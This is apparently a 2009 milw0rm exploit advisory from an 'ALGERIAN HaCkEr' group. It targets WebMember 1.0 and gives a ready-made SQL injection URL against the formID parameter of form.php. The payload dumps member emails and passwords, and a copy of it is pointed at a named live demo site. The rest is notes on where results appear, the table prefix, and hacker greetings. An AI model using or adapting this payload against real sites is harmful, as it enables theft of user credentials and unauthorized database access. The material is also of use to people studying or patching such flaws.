38 lines
No EOL
2.7 KiB
Text
38 lines
No EOL
2.7 KiB
Text
==================================================================================================================
|
|
SSSSS NN N AA K K EEEEE SSSSS TTTTTTTTT EEEEE AA MM MM
|
|
S N N N A A K K E S T E A A M M M M
|
|
SSSSS N N N AAAAAA KKK EEEEE SSSSS T EEEEE AAAAAA M M M M
|
|
S N N N A A K K E S T E A A M M M
|
|
SSSSS N NN A A K K EEEEE SSSSS T EEEEE A A M M
|
|
===================================================SNAKES TEAM====================================================
|
|
|
|
WebMember 1.0 (formID) Remote SQL Injection Vulnerability
|
|
|
|
==============================================:::ALGERIAN HaCkEr:::===============================================
|
|
= = = =
|
|
= = Discovered By: KiM :::ALGERIAN HaCkEr::: = =
|
|
= =
|
|
= = ************ ::::::home : www.snakespc.com/sc::::::*************** = =
|
|
= =
|
|
= = :::::E-mail : x0@hotmail.es::::::: = =
|
|
= =
|
|
= Sript : http://www.phpmembers.com =
|
|
= http://www.phpmembers.com/download.html =
|
|
=================================== Snakespc ======================================
|
|
|
|
[x] Note :You must Sign up......
|
|
|
|
[x] Exploit:
|
|
http://[host]/[script_path]/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM mem_user--
|
|
[x] Live demo:
|
|
http://demo.phpmembers.com/form.php?formID=-100 UNION SELECT 1,2,3,concat_ws(0x3e,email,password),5 FROM demo_user--
|
|
|
|
[x] Note2:
|
|
The injection's result will be in the link or inside the "Not Found" message
|
|
the default prefix of the table name is mem
|
|
===================================================================================================================
|
|
Greet'z : His0k4 ( My Love ^^ ) & Super_Cristal & CMOS_CLR17 & EVILWAY & Dr.OrYx & ALL ALGERIAN HACKERZ
|
|
str0ke.....>>>>.....milw0rm
|
|
===================================================================================================================
|
|
|
|
# milw0rm.com [2009-05-26] |